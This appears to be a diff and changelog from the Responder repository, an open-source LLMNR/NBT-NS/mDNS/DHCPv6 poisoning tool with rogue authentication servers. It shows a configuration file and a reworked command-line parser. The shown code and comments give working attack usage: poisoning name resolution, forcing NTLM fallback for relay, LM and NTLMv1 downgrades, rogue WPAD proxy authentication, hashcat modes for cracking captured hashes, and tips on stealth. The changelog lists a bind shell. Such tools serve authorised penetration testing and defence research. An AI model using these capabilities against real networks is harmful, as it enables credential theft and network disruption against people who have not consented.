- Added: in-scope target, windows >= Vista support (-R) and unicast answers only. ([2e4ed61](https://github.com/lgandx/Responder/commit/2e4ed61bba2df61a1e1165b466a369639c425955) by lgandx).
## [v2.0.7](https://github.com/lgandx/Responder/releases/tag/v2.0.7) - 2014-04-16
<small>[Compare with v2.0.6](https://github.com/lgandx/Responder/compare/v2.0.6...v2.0.7)</small>
### Added
- Added: in-scope llmnr/nbt-ns name option ([1c79bed](https://github.com/lgandx/Responder/commit/1c79bedac9083992ba019ff7134cdb3c718a6f15) by lgandx).
- Added: Kerberos server and -d cli option. ([dcede0f](https://github.com/lgandx/Responder/commit/dcede0fdf5e060e77fc51fbad2da3dbbff8edf8d) by lgandx).
## [v2.0.6](https://github.com/lgandx/Responder/releases/tag/v2.0.6) - 2014-04-01
<small>[Compare with v2.0.5](https://github.com/lgandx/Responder/compare/v2.0.5...v2.0.6)</small>
### Fixed
- Fixed [Enter] key issue ([c97a13c](https://github.com/lgandx/Responder/commit/c97a13c1bdb79b4dcdf43f889fdd586c3c39b893) by lgandx).
## [v2.0.5](https://github.com/lgandx/Responder/releases/tag/v2.0.5) - 2014-03-22
<small>[Compare with v2.0.4](https://github.com/lgandx/Responder/compare/v2.0.4...v2.0.5)</small>
### Added
- Added: In-scope IP handling for MDNS ([b14ff0b](https://github.com/lgandx/Responder/commit/b14ff0b36a100736f293ddbd8bbe1c538a370347) by lgandx).
## [v2.0.4](https://github.com/lgandx/Responder/releases/tag/v2.0.4) - 2014-03-22
<small>[Compare with v2.0.3](https://github.com/lgandx/Responder/compare/v2.0.3...v2.0.4)</small>
### Added
- Added: MDNS Poisoner ([90479ad](https://github.com/lgandx/Responder/commit/90479adcca066602885ea2bfec32953ce71d6977) by lgandx).
## [v2.0.3](https://github.com/lgandx/Responder/releases/tag/v2.0.3) - 2014-03-21
<small>[Compare with v2.0.2](https://github.com/lgandx/Responder/compare/v2.0.2...v2.0.3)</small>
### Fixed
- fix: Bind to interface bug. ([a1a4f46](https://github.com/lgandx/Responder/commit/a1a4f46c7ba8861ff71c1ea2045a72acf2c829bd) by lgandx).
## [v2.0.2](https://github.com/lgandx/Responder/releases/tag/v2.0.2) - 2014-02-06
<small>[Compare with v2.0.1](https://github.com/lgandx/Responder/compare/v2.0.1...v2.0.2)</small>
### Added
- Added: Analyze mode; Lanman Domain/SQL/Workstation passive discovery. ([2c9273e](https://github.com/lgandx/Responder/commit/2c9273eb2ca8d5080ff81273f602547fe649c259) by lgandx).
## [v2.0.1](https://github.com/lgandx/Responder/releases/tag/v2.0.1) - 2014-01-30
<small>[Compare with first commit](https://github.com/lgandx/Responder/compare/e821133708098c74497a3f9b0387a3ad048d5a48...v2.0.1)</small>
### Added
- Added: Analyze ICMP Redirect plausibility on current subnet. ([06df704](https://github.com/lgandx/Responder/commit/06df704960c556e3c2261a52827d55eb7b4ed0d4) by lgandx).
- Added: Analyze stealth mode. See all traffic, but dont answer (-A cli). Minor bugs also fixed. ([9bb2f81](https://github.com/lgandx/Responder/commit/9bb2f81044cd94f36f54c8daf7f1183bc761bb24) by lgandx).
- Added: -F command line switch to force authentication on PAC file retrieval. Default is Off ([3f48c11](https://github.com/lgandx/Responder/commit/3f48c114d5e713bfe68bef1717e18d3c266f358e) by lgandx).
- Added: IMAP module and enhanced wpad. ([af60de9](https://github.com/lgandx/Responder/commit/af60de95679f20eca4765b1450f80c48fbef689c) by lgandx).
- Added: SMTP PLAIN/LOGIN module ([6828f1b](https://github.com/lgandx/Responder/commit/6828f1b11ebfc0fc25a8fd00e8f373f3adfb7fc6) by lgandx).
- Added: POP3 module. ([f48ea3f](https://github.com/lgandx/Responder/commit/f48ea3f4b644c3eb25c63d402c6d30fcd29be529) by lgandx).
- Added: MSSQL Plaintext module ([4c3a494](https://github.com/lgandx/Responder/commit/4c3a494c86b7a95cf2c43a71bac182f231bf71cb) by lgandx).
- Added: SMBRelay module ([4dd9d8c](https://github.com/lgandx/Responder/commit/4dd9d8c1df3717ed928e73083c30e21aa5eaf8b4) by lgandx).
- added: Command switch -v for verbose mode. Responder is now less verbose. ([46b98a6](https://github.com/lgandx/Responder/commit/46b98a616d540ae618198784d0775e687371858e) by lgandx).
- Added support for .pac file requests. ([6b7e5b6](https://github.com/lgandx/Responder/commit/6b7e5b6441c7fdf19a163b8efb6fd588ccfee8ae) by lgandx).
- Added: print HTTP URL, POST data requested prior auth ([f616718](https://github.com/lgandx/Responder/commit/f6167183e046d2759ab6b885dd2f94bb2902c564) by lgandx).
- Added command switch -I. This option override Responder.conf Bind_to setting ([68de4ac](https://github.com/lgandx/Responder/commit/68de4ac26ec34bbf24524abb0c0b11ae34aa27a3) by lgandx).
- Added: in-scope only target. See Responder.conf. ([0465bd6](https://github.com/lgandx/Responder/commit/0465bd604d7cc22ef2c97f938d8564677030e5bd) by lgandx).
- Added: Fake access denied html page ([9b608aa](https://github.com/lgandx/Responder/commit/9b608aad30529e2bfea4d7c6e99343df0ba2d9d0) by lgandx).
- Added: Configuration file, removed several cli options and several fixes. ([95eed09](https://github.com/lgandx/Responder/commit/95eed099424568d4c67402f12a5de5d9d72c3041) by lgandx).
- Added: Configuration file for Responder ([d573102](https://github.com/lgandx/Responder/commit/d57310273df524b99d17c97b49ee35eb3aec7b52) by lgandx).
- Added: Bind shell listening on port 140, use it with -e or -exe option if needed ([1079de0](https://github.com/lgandx/Responder/commit/1079de052b7cc7c6caeb80e6ee081568ff359317) by Lgandx).
- Added: Ability to serve whatever kind of file via HTTP and WPAD There's now 3 new options. ([a8c2952](https://github.com/lgandx/Responder/commit/a8c29522db3555f7733a80d29271b3229e1149c6) by Lgandx).
- added -I option to bind all sockets to a specific ip (eg: listen only on eth0) ([d5088b2](https://github.com/lgandx/Responder/commit/d5088b24ee3d8bead640b37480be57fe564e70b5) by Lgandx).
- added: HTTP auth forward to SMB. This is useful for SMB Relay or LM downgrade from HTTP NTLM ESS to SMB LM. ([0fcaa68](https://github.com/lgandx/Responder/commit/0fcaa68c074e496edb2164ca35659ff636b5a361) by Lgandx).
- added automatic poisoning mode when a primary and a secondary DNS is specified. ([ccbbbe3](https://github.com/lgandx/Responder/commit/ccbbbe34535c12b664a39f5a99f98c1da79ca5a6) by Lgandx).
- Added HTTPS module. ([9250281](https://github.com/lgandx/Responder/commit/92502814aa3becdd064f0bfb160af826adb42f60) by Lgandx).
- Added support for LM hash downgrade. Default still NTLMSSP. ([09f8f72](https://github.com/lgandx/Responder/commit/09f8f7230d66cb35e1e6bed9fb2c9133ad5cc415) by Lgandx).
- Added: Client ip is now part of the cookie filename ([2718f9c](https://github.com/lgandx/Responder/commit/2718f9c51310e18e91d6d90c86657bdd72889f2a) by Lgandx).
- Added a folder for storing HTTP cookies files ([d1a14e2](https://github.com/lgandx/Responder/commit/d1a14e2f27d856ca1551232502835d6cddb3602d) by Lgandx).
- Added WPAD transparent proxy ([9f1c3bc](https://github.com/lgandx/Responder/commit/9f1c3bcba32c6feb008a39ece688522dcd9e757f) by Lgandx).
### Fixed
- Fixed WPAD cookie capture ([afe2b63](https://github.com/lgandx/Responder/commit/afe2b63c6a556a6da97e7ac89c96f89276d521c3) by lgandx).
- Fix: Command line switch typo ([4fb4233](https://github.com/lgandx/Responder/commit/4fb4233424273849085781225298de39b6c9c098) by lgandx).
- Fixed minor bugs ([f8a16e2](https://github.com/lgandx/Responder/commit/f8a16e28ee15a3af91542269e5b1ec9c69ea3d75) by Lgandx).
- Fixed duplicate entry in hash file for machine accounts ([4112b1c](https://github.com/lgandx/Responder/commit/4112b1cd5d06f021dcc145f32d29b53d4cb8d82a) by Lgandx).
- fix for anonymous NTLM connection for LDAP server ([1c47e7f](https://github.com/lgandx/Responder/commit/1c47e7fcb112d0efdb509e56a1b08d557eb9f375) by Lgandx).
### Changed
- Changed WPAD to Off by default. Use command line -w On to enable. ([bf2fdf0](https://github.com/lgandx/Responder/commit/bf2fdf083cdadf81747f87eb138a474911928b77) by lgandx).
- changed .txt to no extension. ([5f7bfa8](https://github.com/lgandx/Responder/commit/5f7bfa8cbe75d0c7fd24c8a83c44a5c3b02717a4) by lgandx).
- Changed Windows =< 5.2 documentation to XP/2003 and earlier for clarification ([56dd7b8](https://github.com/lgandx/Responder/commit/56dd7b828cf85b88073e88a8b4409f7dae791d49) by Garret Picchioni).
### Removed
- Removed bind to interface support for OsX. Responder for OsX can only listen on all interfaces. ([dbfdc27](https://github.com/lgandx/Responder/commit/dbfdc2783156cfeede5114735ae018a925b3fa78) by lgandx).

76
Contributors Normal file
View File

@@ -0,0 +1,76 @@
Commits | user
15 @jrmdev
7 @nobbd
6 @ValdikSS
6 @also-here
5 @HexPandaa
5 @exploide
5 @jvoisin
4 @Clément Notin
4 @Shutdown
4 @Yannick Méheut
3 @Hank Leininger
3 @brightio
3 @byt3bl33d3r
3 @myst404
3 @skelsec
2 @Alexandre ZANNI
2 @Crypt0-M3lon
2 @Laban Sköllermark
2 @Matthew Daley
2 @Pixis
2 @Rob Fuller
2 @ThePirateWhoSmellsOfSunflowers
2 @Vincent Yiu
2 @requin
1 @Andrii Nechytailov
1 @Antonio Herraiz
1 @Chris Maddalena
1 @Euan
1 @Garret Picchioni
1 @Gifts
1 @Gustaf Blomqvist
1 @Hubert Seiwert
1 @IMcPwn
1 @Jared Haight
1 @Jim Shaver
1 @Khiem Doan
1 @Leon Jacobs
1 @Lionel PRAT
1 @Markus
1 @MatToufoutu
1 @Matt
1 @Matt Andreko
1 @Matt Kelly
1 @Nikos Vassakis
1 @OJ
1 @Paul A
1 @Randy Ramos
1 @SAERXCIT
1 @Sagar-Jangam
1 @Sans23
1 @Sophie Brun
1 @Stephen Shkardoon
1 @Syntricks
1 @Timon Hackenjos
1 @Tom Aviv
1 @Ziga P
1 @cweedon
1 @deltronzero
1 @f3rn0s
1 @jackassplus
1 @jb
1 @kevintellier
1 @kitchung
1 @klemou
1 @lanjelot
1 @nickyb
1 @nodauf
1 @nop5L3D
1 @pixis
1 @ravenium
1 @soa
1 @steven
1 @thejosko
1 @trustedsec

2
DumpHash.py
View File

@@ -1,4 +1,4 @@
#!/usr/bin/env python
#!/usr/bin/env python3
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com

1090
README.md
View File

File diff suppressed because it is too large Load Diff

2
Report.py
View File

@@ -1,4 +1,4 @@
#!/usr/bin/env python
#!/usr/bin/env python3
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com

112
Responder.conf
View File

@@ -1,23 +1,34 @@
[Responder Core]
; Servers to start
SQL = On
SMB = On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
DCERPC = On
WINRM = On
SNMP = Off
; Poisoners to start
MDNS = On
LLMNR = On
NBTNS = On
; Custom challenge.
#IPv6 conf:
DHCPv6 = Off
; Servers to start
SQL = On
SMB = On
QUIC = On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
DCERPC = On
WINRM = On
SNMP = On
MQTT = On
MYSQL = On
; Custom challenge.
; Use "Random" for generating a random challenge for each requests (Default)
Challenge = Random
@@ -38,7 +49,7 @@ AnalyzeLog = Analyzer-Session.log
ResponderConfigDump = Config-Responder.log
; Specific IP Addresses to respond to (default = All)
; Example: RespondTo = 10.20.1.100-150, 10.20.3.10
; Example: RespondTo = 10.20.1.100-150, 10.20.3.10, fe80::e059:5c8f:a486:a4ea-a4ef, 2001:db8::8a2e:370:7334
RespondTo =
; Specific NBT-NS/LLMNR names to respond to (default = All)
@@ -47,13 +58,18 @@ RespondTo =
RespondToName =
; Specific IP Addresses not to respond to (default = None)
; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10
; Hosts with IPv4 and IPv6 addresses must have both addresses included to prevent responding.
; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10, fe80::e059:5c8f:a486:a4ea-a4ef, 2001:db8::8a2e:370:7334
DontRespondTo =
; Specific NBT-NS/LLMNR names not to respond to (default = None)
; Example: DontRespondTo = NAC, IPS, IDS
; Example: DontRespondToName = NAC, IPS, IDS
DontRespondToName = ISATAP
; MDNS TLD not to respond to (default = _dosvc). Do not add the ".", only the TLD.
; Example: DontRespondToTLD = _dosvc, _blasvc, etc
DontRespondToTLD = _dosvc
; If set to On, we will stop answering further requests from a host
; if a hash has been previously captured for this host.
AutoIgnoreAfterSuccess = Off
@@ -63,11 +79,63 @@ AutoIgnoreAfterSuccess = Off
; This may break file serving and is useful only for hash capture
CaptureMultipleCredentials = On
; If set to On, we will write to file all hashes captured from the same host.
; In this case, Responder will log from 172.16.0.12 all user hashes: domain\toto,
; If set to On, we will write to file all hashes captured from the same host.
; In this case, Responder will log from 172.16.0.12 all user hashes: domain\toto,
; domain\popo, domain\zozo. Recommended value: On, capture everything.
CaptureMultipleHashFromSameHost = On
;IPv6 section
[DHCPv6 Server]
; Domain to filter DNS and DHCPv6 poisoning responses
; Only respond to clients in this domain
; Leave empty to poison all domains (NOT RECOMMENDED - causes network disruption)
; Example: corp.local
DHCPv6_Domain =
; Send Router Advertisements to speed up IPv6 configuration
; Only needed on networks without RA Guard protection
; Default: Off (more stealthy, waits for natural DHCPv6 SOLICIT)
; WARNING: Sending RA can be more detectable
SendRA = Off
; Specific IPv6 address to bind to and advertise as DNS server
; Leave empty to auto-detect link-local address (recommended)
; Example: fe80::1
; Example: 2001:db8::1
BindToIPv6 =
[Kerberos]
; ======================================================
; Kerberos Operation Mode (NEW FEATURE)
; ======================================================
;
; CAPTURE (default) - Capture Kerberos AS-REP hashes
; - Responds with KDC_ERR_PREAUTH_REQUIRED
; - Client sends encrypted timestamp
; - Responder captures AS-REP hash
; - Crack with: hashcat -m 7500
; - Good for: Stealthy operation, unique Kerberos hashes
;
; FORCE_NTLM - Force client to fall back to NTLM
; - Responds with KDC_ERR_ETYPE_NOSUPP
; - Client abandons Kerberos, tries NTLM
; - Responder's SMB/HTTP captures NetNTLMv2
; - Crack with: hashcat -m 5600
; - Good for: Relay attacks, faster cracking
;
; Choose based on engagement needs:
; - Use CAPTURE for stealth and Kerberos-specific hashes
; - Use FORCE_NTLM for relay attacks or faster cracking
;
; Default: CAPTURE (if not specified)
; ======================================================
KerberosMode = CAPTURE
; Alternative: Force NTLM fallback
;KerberosMode = FORCE_NTLM
[HTTP Server]
; Set to On to always serve the custom EXE

458
Responder.py
View File

@@ -14,6 +14,7 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import asyncio
import optparse
import ssl
try:
@@ -25,26 +26,281 @@ from utils import *
import struct
banner()
parser = optparse.OptionParser(usage='python %prog -I eth0 -w -d\nor:\npython %prog -I eth0 -wd', version=settings.__version__, prog=sys.argv[0])
parser.add_option('-A','--analyze', action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests without responding.", dest="Analyze", default=False)
parser.add_option('-I','--interface', action="store", help="Network interface to use, you can use 'ALL' as a wildcard for all interfaces", dest="Interface", metavar="eth0", default=None)
parser.add_option('-i','--ip', action="store", help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None)
parser.add_option('-6', "--externalip6", action="store", help="Poison all requests with another IPv6 address than Responder's one.", dest="ExternalIP6", metavar="2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed", default=None)
parser.add_option('-e', "--externalip", action="store", help="Poison all requests with another IP address than Responder's one.", dest="ExternalIP", metavar="10.0.0.22", default=None)
parser.add_option('-b', '--basic', action="store_true", help="Return a Basic HTTP authentication. Default: NTLM", dest="Basic", default=False)
parser.add_option('-d', '--DHCP', action="store_true", help="Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False", dest="DHCP_On_Off", default=False)
parser.add_option('-D', '--DHCP-DNS', action="store_true", help="This option will inject a DNS server in the DHCP response, otherwise a WPAD server will be added. Default: False", dest="DHCP_DNS", default=False)
import optparse
import textwrap
parser.add_option('-w','--wpad', action="store_true", help="Start the WPAD rogue proxy server. Default value is False", dest="WPAD_On_Off", default=False)
parser.add_option('-u','--upstream-proxy', action="store", help="Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)", dest="Upstream_Proxy", default=None)
parser.add_option('-F','--ForceWpadAuth', action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval. This may cause a login prompt. Default: False", dest="Force_WPAD_Auth", default=False)
class ResponderHelpFormatter(optparse.IndentedHelpFormatter):
"""Custom formatter for better help output"""
def format_description(self, description):
if description:
return description + "\n"
return ""
def format_epilog(self, epilog):
if epilog:
return "\n" + epilog + "\n"
return ""
parser.add_option('-P','--ProxyAuth', action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective. Default: False", dest="ProxyAuth_On_Off", default=False)
parser.add_option('-Q','--quiet', action="store_true", help="Tell Responder to be quiet, disables a bunch of printing from the poisoners. Default: False", dest="Quiet", default=False)
def create_parser():
"""Create argument parser with organized option groups"""
usage = textwrap.dedent("""\
python3 %prog -I eth0 -v""")
description = textwrap.dedent("""\
══════════════════════════════════════════════════════════════════════════════
Responder - LLMNR/NBT-NS/mDNS Poisoner and Rogue Authentication Servers
══════════════════════════════════════════════════════════════════════════════
Captures credentials by responding to broadcast/multicast name resolution,
DHCP, DHCPv6 requests
══════════════════════════════════════════════════════════════════════════════""")
epilog = textwrap.dedent("""\
══════════════════════════════════════════════════════════════════════════════
Examples:
══════════════════════════════════════════════════════════════════════════════
Basic poisoning: python3 Responder.py -I eth0 -v
##Watch what's going on:
Analyze mode (passive): python3 Responder.py -I eth0 -Av
parser.add_option('--lm', action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
parser.add_option('--disable-ess', action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False)
parser.add_option('-v','--verbose', action="store_true", help="Increase verbosity.", dest="Verbose")
##Working on old networks:
WPAD with forced auth: python3 Responder.py -I eth0 -wFv
##Great module:
Proxy auth: python3 Responder.py -I eth0 -Pv
##DHCPv6 + Proxy authentication:
DHCPv6 attack: python3 Responder.py -I eth0 --dhcpv6 -vP
##DHCP -> WPAD injection -> Proxy authentication:
DHCP + WPAD injection: python3 Responder.py -I eth0 -Pvd
##Poison requests to an arbitrary IP:
Poison with external IP: python3 Responder.py -I eth0 -e 10.0.0.100
##Poison requests to an arbitrary IPv6 IP:
Poison with external IPv6: python3 Responder.py -I eth0 -6 2800:ac:4000:8f9e:c5eb:2193:71:1d12
══════════════════════════════════════════════════════════════════════════════
For more info: https://github.com/lgandx/Responder/blob/master/README.md
══════════════════════════════════════════════════════════════════════════════""")
parser = optparse.OptionParser(
usage=usage,
version=settings.__version__,
prog="Responder.py",
description=description,
epilog=epilog,
formatter=ResponderHelpFormatter()
)
# -------------------------------------------------------------------------
# REQUIRED OPTIONS
# -------------------------------------------------------------------------
required = optparse.OptionGroup(parser,
"Required Options",
"These options must be specified")
required.add_option('-I', '--interface',
action="store",
dest="Interface",
metavar="eth0",
default=None,
help="Network interface to use. Use 'ALL' for all interfaces.")
parser.add_option_group(required)
# -------------------------------------------------------------------------
# POISONING OPTIONS
# -------------------------------------------------------------------------
poisoning = optparse.OptionGroup(parser,
"Poisoning Options",
"Control how Responder poisons name resolution requests")
poisoning.add_option('-A', '--analyze',
action="store_true",
dest="Analyze",
default=False,
help="Analyze mode. See requests without poisoning. (passive)")
poisoning.add_option('-e', '--externalip',
action="store",
dest="ExternalIP",
metavar="IP",
default=None,
help="Poison with a different IPv4 address than Responder's.")
poisoning.add_option('-6', '--externalip6',
action="store",
dest="ExternalIP6",
metavar="IPv6",
default=None,
help="Poison with a different IPv6 address than Responder's.")
poisoning.add_option('--rdnss',
action="store_true",
dest="RDNSS_On_Off",
default=False,
help="Poison via Router Advertisements with RDNSS. Sets attacker as IPv6 DNS.")
poisoning.add_option('--dnssl',
action="store",
dest="DNSSL_Domain",
metavar="DOMAIN",
default=None,
help="Poison via Router Advertisements with DNSSL. Injects DNS search suffix.")
poisoning.add_option('-t', '--ttl',
action="store",
dest="TTL",
metavar="HEX",
default=None,
help="Set TTL for poisoned answers. Hex value (30s = 1e) or 'random'.")
poisoning.add_option('-N', '--AnswerName',
action="store",
dest="AnswerName",
metavar="NAME",
default=None,
help="Canonical name in LLMNR answers. (for Kerberos relay over HTTP)")
parser.add_option_group(poisoning)
# -------------------------------------------------------------------------
# DHCP OPTIONS
# -------------------------------------------------------------------------
dhcp = optparse.OptionGroup(parser,
"DHCP Options",
"DHCP and DHCPv6 poisoning attacks")
dhcp.add_option('-d', '--DHCP',
action="store_true",
dest="DHCP_On_Off",
default=False,
help="Enable DHCPv4 poisoning. Injects WPAD in DHCP responses.")
dhcp.add_option('-D', '--DHCP-DNS',
action="store_true",
dest="DHCP_DNS",
default=False,
help="Inject DNS server (not WPAD) in DHCPv4 responses.")
dhcp.add_option('--dhcpv6',
action="store_true",
dest="DHCPv6_On_Off",
default=False,
help="Enable DHCPv6 poisoning. WARNING: May disrupt network.")
parser.add_option_group(dhcp)
# -------------------------------------------------------------------------
# WPAD / PROXY OPTIONS
# -------------------------------------------------------------------------
wpad = optparse.OptionGroup(parser,
"WPAD / Proxy Options",
"Web Proxy Auto-Discovery attacks")
wpad.add_option('-w', '--wpad',
action="store_true",
dest="WPAD_On_Off",
default=False,
help="Start WPAD rogue proxy server.")
wpad.add_option('-F', '--ForceWpadAuth',
action="store_true",
dest="Force_WPAD_Auth",
default=False,
help="Force NTLM/Basic auth on wpad.dat retrieval. (may show prompt)")
wpad.add_option('-P', '--ProxyAuth',
action="store_true",
dest="ProxyAuth_On_Off",
default=False,
help="Force proxy authentication. Highly effective. (can't use with -w)")
wpad.add_option('-u', '--upstream-proxy',
action="store",
dest="Upstream_Proxy",
metavar="HOST:PORT",
default=None,
help="Upstream proxy for rogue WPAD proxy outgoing requests.")
parser.add_option_group(wpad)
# -------------------------------------------------------------------------
# AUTHENTICATION OPTIONS
# -------------------------------------------------------------------------
auth = optparse.OptionGroup(parser,
"Authentication Options",
"Control authentication methods and downgrades")
auth.add_option('-b', '--basic',
action="store_true",
dest="Basic",
default=False,
help="Return HTTP Basic auth instead of NTLM. (cleartext passwords)")
auth.add_option('--lm',
action="store_true",
dest="LM_On_Off",
default=False,
help="Force LM hashing downgrade. (for Windows XP/2003)")
auth.add_option('--disable-ess',
action="store_true",
dest="NOESS_On_Off",
default=False,
help="Disable Extended Session Security. (NTLMv1 downgrade)")
auth.add_option('-E', '--ErrorCode',
action="store_true",
dest="ErrorCode",
default=False,
help="Return STATUS_LOGON_FAILURE. (enables WebDAV auth capture)")
parser.add_option_group(auth)
# -------------------------------------------------------------------------
# OUTPUT OPTIONS
# -------------------------------------------------------------------------
output = optparse.OptionGroup(parser,
"Output Options",
"Control verbosity and logging")
output.add_option('-v', '--verbose',
action="store_true",
dest="Verbose",
default=False,
help="Increase verbosity. (recommended)")
output.add_option('-Q', '--quiet',
action="store_true",
dest="Quiet",
default=False,
help="Quiet mode. Minimal output from poisoners.")
parser.add_option_group(output)
# -------------------------------------------------------------------------
# PLATFORM OPTIONS
# -------------------------------------------------------------------------
platform = optparse.OptionGroup(parser,
"Platform Options",
"OS-specific settings")
platform.add_option('-i', '--ip',
action="store",
dest="OURIP",
metavar="IP",
default=None,
help="Local IP to use. (OSX only)")
parser.add_option_group(platform)
return parser
parser = create_parser()
options, args = parser.parse_args()
if not os.geteuid() == 0:
@@ -54,6 +310,10 @@ elif options.OURIP == None and IsOsX() == True:
print("\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n")
parser.print_help()
exit(-1)
elif options.ProxyAuth_On_Off and options.WPAD_On_Off:
print("\n\033[1m\033[31mYou cannot use WPAD server and Proxy_Auth server at the same time, choose one of them.\033[0m\n")
exit(-1)
settings.init()
settings.Config.populate(options)
@@ -65,6 +325,8 @@ settings.Config.ExpandIPRanges()
#Create the DB, before we start Responder.
CreateResponderDb()
Have_IPv6 = settings.Config.IPv6
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
def server_bind(self):
if OsInterfaceIsSupported():
@@ -74,10 +336,12 @@ class ThreadingUDPServer(ThreadingMixIn, UDPServer):
else:
if (sys.version_info > (3, 0)):
self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
if Have_IPv6:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
else:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
if Have_IPv6:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
except:
pass
UDPServer.server_bind(self)
@@ -91,10 +355,12 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
else:
if (sys.version_info > (3, 0)):
self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
if Have_IPv6:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
else:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
if Have_IPv6:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
except:
pass
TCPServer.server_bind(self)
@@ -108,14 +374,44 @@ class ThreadingTCPServerAuth(ThreadingMixIn, TCPServer):
else:
if (sys.version_info > (3, 0)):
self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
if Have_IPv6:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
else:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
if Have_IPv6:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
except:
pass
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
TCPServer.server_bind(self)
class ThreadingUDPDHCPv6Server(ThreadingMixIn, UDPServer):
allow_reuse_address = True
address_family = socket.AF_INET6
def server_bind(self):
import socket
import struct
# Bind to :: (accept packets to ANY address including multicast)
UDPServer.server_bind(self)
print(color("[DHCPv6] Make sure to review DHCPv6 settings Responder.conf\n[DHCPv6] Only run this module for short periods of time, you might cause some disruption.", 2, 1))
# Join multicast group
group = socket.inet_pton(socket.AF_INET6, 'ff02::1:2')
if_index = socket.if_nametoindex(settings.Config.Interface)
mreq = group + struct.pack('@I', if_index)
try:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_LOOP, 1)
print(color("[DHCPv6] Joined ff02::1:2 port 547 on %s" % settings.Config.Interface, 2, 1))
except Exception as e:
print(color("[!] Multicast join failed: %s" % str(e), 1, 1))
# Set address family to IPv6
ThreadingUDPDHCPv6Server.address_family = socket.AF_INET6
class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
def server_bind(self):
@@ -127,11 +423,13 @@ class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
#IPV6:
if (sys.version_info > (3, 0)):
mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
if Have_IPv6:
mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
else:
mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
if Have_IPv6:
mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
if OsInterfaceIsSupported():
try:
if settings.Config.Bind_To_ALL:
@@ -139,10 +437,12 @@ class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
else:
if (sys.version_info > (3, 0)):
self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
if Have_IPv6:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
else:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
if Have_IPv6:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
except:
pass
UDPServer.server_bind(self)
